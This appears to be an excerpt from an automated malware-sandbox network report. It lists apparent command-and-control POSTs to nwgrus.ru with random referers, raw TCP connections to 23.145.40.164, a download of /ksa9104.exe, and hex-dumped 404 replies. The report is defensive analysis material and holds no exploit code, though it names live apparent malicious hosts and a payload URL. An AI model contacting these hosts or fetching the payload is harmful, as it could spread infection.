                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bxntarqqdjdvdpxp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://blfmqjnqqyje.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gieuyuggiqfgtm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eankyeljcevd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://luejdvwxxrcvrqdh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://svfopofgftavf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bprjpwpsmmrgaa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ocnxfkuqumobjmad.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dxdhacbibrdlwrt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nlmsxhroxptelhd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hikneccvvrshgb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: nwgrus.ru
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
                  Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
                  Source: global trafficDNS traffic detected: DNS query: calvinandhalls.com
                  Source: unknownHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://mcjvrcrjrartnd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:38:44 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:38:55 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:38:56 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:39:03 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:40:17 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:40:37 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:40:59 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:41:22 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:37:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 e4 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:37:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:37:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:37:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:37:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
